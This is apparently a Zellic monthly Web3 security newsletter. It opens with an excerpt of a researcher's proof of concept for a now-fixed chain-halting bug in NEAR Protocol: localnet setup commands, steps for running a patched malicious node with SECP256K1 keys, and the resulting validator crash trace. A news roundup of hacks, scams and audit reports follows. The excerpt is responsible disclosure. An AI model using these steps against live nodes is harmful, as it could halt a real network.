Welcome to the Zellic Security Roundup, a monthly security-focused newsletter covering valuable security news and analysis in Web3.

This month will focus on a chain-halting vulnerability discovered by a Zellic Security Researcher in NEAR Protocol, our recently completed audit reports, and the latest news in Web3 security.

Cool Finds at Zellic

Below is a snippet from our blog post “Web3 Ping of Death: Finding and Fixing a Chain-Halting Vulnerability in NEAR” written by Zellic Security Researcher @farazsth98.

Proof-of-Concept Exploit

When I started writing up a proof of concept to demonstrate this bug in the localnet environment, I found it somewhat surprising that there was no code path that allows a NEAR node to generate SECP256K1 type keys.

This somewhat explains why the two bugs shown above are so simple in nature — there simply wasn’t a way to generate SECP256K1 keys in the localnet environment, and therefore this code path ended up never being tested. All generated keys are hardcoded to be ED25519 keys.

Local Network Setup

I first set up a local network with the following configuration:

• One validator node

• One full node

In this setup, the validator node would be a legitimate node that is running and continuously producing blocks. The full node would be the malicious node that I patch and introduce into the network.

The end goal is for the malicious full node to connect to the network and immediately crash the validator node.

To do this, I pulled the nearcore repo (found here, commit e0f0da5c3dde29122e956dfd905811890de9a570) and ran make neard-debug -j8 to build a debug version of the node. You can find the final node binary in target/debug/neard. I renamed the binary to neard_legit because I would be rebuilding the binary with my malicious patch applied later on.

I then used the following command to generate a localnet configuration with one validator node and one full node:

$ target/debug/neard_legit --home ./localnet_config localnet -v 1 -n 1

The validator node configuration can be found in ./localnet_config/node0, while the full node can be found in ./localnet_config/node1.

Before continuing, I would need to rebuild the neard binary, except this time with my malicious patches added.

Maliciously Patching the Full Node

The final patch diff file can be found here.

Note that the same .expect() vulnerability also existed in the Signature::sign() function in the same code file. However, this function is only used by the sending peer and thus would not lead to a security impact.

However, I’d still need to patch the vulnerability in the malicious node, as otherwise, it would just crash when signing the owned_account.payload.

My patch does a few things:

1. It patches the .expect() vulnerability in the Signature::sign() and Signature::verify() functions. This allows the malicious node to create SECP256K1 signatures without crashing.

2. It patches the code used by the neard localnet command to make it generate SECP256K1 keys instead of ED25519 keys.

The patch should apply cleanly to commit e0f0da5c3dde29122e956dfd905811890de9a570.

After this, I rebuilt the neard binary again. I used it to then generate a malicious network configuration. This allowed me to copy over the validator_key.json and node_key.json files of the malicious node into ./localnet_config/node1, which means the malicious full node in my localnet environment will now use SECP256K1 keys:

$ target/debug/neard --home ./localnet_malicious_config localnet -v 1

$ cat localnet_malicious_config/node0/validator_key.json
{
  "account_id": "node0",
  "public_key": "secp256k1:nUsQNkHfWWPWP5bkF73AN43VXKmztJdcuqL44yKT2GfyezYbWAu9wK8MLLjxPWxjJgeGu2qapnQVnGBZKW4tFcd",
  "secret_key": "secp256k1:E7rvMjFtqC1KddPt8pqF1HGBxqbAUJMkP8EXbNAUwokB"
}

$ cp localnet_malicious_config/node0/*key.json localnet_config/node1/

Triggering the Crash

To demonstrate the crash, I first started the legitimate validator node in one terminal:

$ target/debug/neard_legit --home ./localnet_config/node0/ run

I then started my malicious validator node in another terminal. Note that target/debug/neard is the malicious node as it was compiled second. It is also using the SECP256K1 keys that were copied into its configuration directory:

$ target/debug/neard --home localnet_config/node1/ run

Immediately after starting this node, the legitimate validator node crashes with the following snipped stack trace (the logs can be found in ./localnet_config/node0/logs.txt):

thread 'actix-rt|system:0|arbiter:11' panicked at core/crypto/src/signature.rs:557:63:
32 bytes: InvalidMessage
stack backtrace:
   0: rust_begin_unwind
             at /rustc/79e9716c980570bfd1f666e3b16ac583f0168962/library/std/src/panicking.rs:597:5
   1: core::panicking::panic_fmt
             at /rustc/79e9716c980570bfd1f666e3b16ac583f0168962/library/core/src/panicking.rs:72:14
   2: core::result::unwrap_failed
             at /rustc/79e9716c980570bfd1f666e3b16ac583f0168962/library/core/src/result.rs:1652:5
   3: core::result::Result<T,E>::expect
             at /rustc/79e9716c980570bfd1f666e3b16ac583f0168962/library/core/src/result.rs:1034:23
   4: near_crypto::signature::Signature::verify
             at ./core/crypto/src/signature.rs:551:27
   5: near_network::network_protocol::AccountKeySignedPayload::verify
             at ./chain/network/src/network_protocol/mod.rs:211:15

And there it was — the handshake of death. I could now say with 100% certainty that the vulnerability was real and could be used to crash any node on the network. As an added bonus, if any legitimate nodes come back online while the malicious node is still running, they end up instantly crashing again.

Zellic Research & Writing

Web3 Ping of Death: Finding and Fixing a Chain-Halting Vulnerability in NEAR

A look into how Zellic identified and helped fix a vulnerability in NEAR Protocol.

Two Vulnerabilities in gnark's Groth16 Proofs

An analysis of two vulnerabilities Zellic discovered that broke zero-knowledge and soundness of gnark’s Groth16 proofs with commitments.

In the News

Research

• Following the public disclosure of the two vulnerabilities discovered by Zellic Security Researcher Malte Leip, the gnark team confirmed the fix for both issues and explained the fixes in this thread.

• Thomas Roche, a researcher at NinjaLab, discovered a side-chain vulnerability in the cryptographic library of Infineon Technologies, which could lead to an EUCLEAK attack allowing attackers to extract Elliptic Curve Digital Signature Algorithm secret keys and create a clone of the FIDO device.

• Pablo Sabbatella interviewed Fredrik Svantes, Security Research Lead at the Ethereum Foundation, to discuss operational security within the blockchain space, the crucial role of incident response, and the importance of transparency in the vulnerability disclosure process.

• The Security Frameworks by Security Alliance (SEAL) is “a curated resource for those seeking knowledge in the realm of blockchain security".

• In a GitLab blog post from 2021, the author Chris Moberly covers drive-by attacks in which malicious code hidden in a website uses your own browser to attack your computer, and he covers the steps you can take to reduce this chance of a drive-by attack happening to you.

• “Attacking UNIX Systems via Cups, Part I” is a deep dive into a vulnerability in which “a remote unauthenticated attacker can silently replace existing printers’ (or install new ones) IPP urls with a malicious one, resulting in arbitrary command execution (on the computer) when a print job is started (from that computer)”.

Hacks

• Shezmu, a hybrid lending platform, recovered ~$5M of stolen funds following the exploitation of one of its ShezmuUSD stablecoin vaults. After agreeing to the terms, the hacker sent the stolen Dai tokens and the remaining balance in ETH and WETH.

• Onyx, a DeFi protocol, was exploited for $3.8M (a combination of virtual USD, Onyxcoin, Wrapped Bitcoin, DAI, and USDT) due to a vulnerability in its NFT-liquidation contract.

• Bedrock, a liquid restaking protocol, released a post-mortem report following their $2M exploit stemming from a vulnerability in a uniBTC smart contract.

Crime

• The US Department of Justice charged two Russian nationals over a cryptocurrency laundering scheme with transactions totaling ~$1.15B in value from July 12, 2013 - August 10, 2024.

• German authorities shut down 47 illegal cryptocurrency exchange services in the country accusing operators of large-scale money laundering by neglecting to enforce anti-money laundering regulations.

Legal

• The U.S. Department of Treasury announced that it is undertaking actions to disrupt Russian cybercrime services. This coordinated international effort is specifically targeting PM2BTC and Cryptex, Russian virtual currency exchangers, and aims to “counter the ransomware threat and target Russian illicit financial activity”.

• Tether participated in a joint operation led by the Dutch Fiscal Information and Investigation Service and the National High Tech Crime Unit by freezing digital assets and wallets linked to suspects.

• Gurbir Grewal, the SEC’s Director of Enforcement who focused heavily on addressing noncompliance in the cryptocurrency industry, is stepping down from his position following 21 years spent with the SEC.

Scams

• ZackXBT published an investigation into how three malicious individuals stole $243M from a single person in a “highly sophisticated social engineering attack”.

• The FBI reported that Americans lost $5.6B in 2023 from crypto fraud scams, a 45% increase from 2022.

• Facct, a thread intelligence firm, reported that hackers exploited auto-reply emails from compromised accounts seeking to install the XMRig miner on victims’ devices to mine digital assets.

• BaseBros Fi, a DeFi protocol on the Base blockchain, vanished from the internet after stealing its users’ funds through an unaudited smart contract.

Meet Up With Us

We won’t be traveling in October, but if you’d like to schedule a call with our team, reach out to sales@zellic.io!

Recent Zellic Audit Reports

• Acctual Batch Payments Audit Report: Acctual developed a smart contract that allows their users to create batch / multisend transactions of native and ERC-20 tokens to pay their crypto bills.

• Yeet Audit Report: Yeet is a gamified DeFi protocol in the Berachain ecosystem with no dominant game theoretic strategy.

• Saffron Audit Report: Saffron LIDO Fixed Income Vaults provides fixed income from ETH staking.

• Chainflip Audit Report: Chainflip is a cross-chain asset-exchange protocol. At its core are two major innovations — fully distributed and permissionless 100-of-150 multi-signature vaults using the FROST signing protocol and a novel and highly capital-efficient JIT (just-in-time) AMM.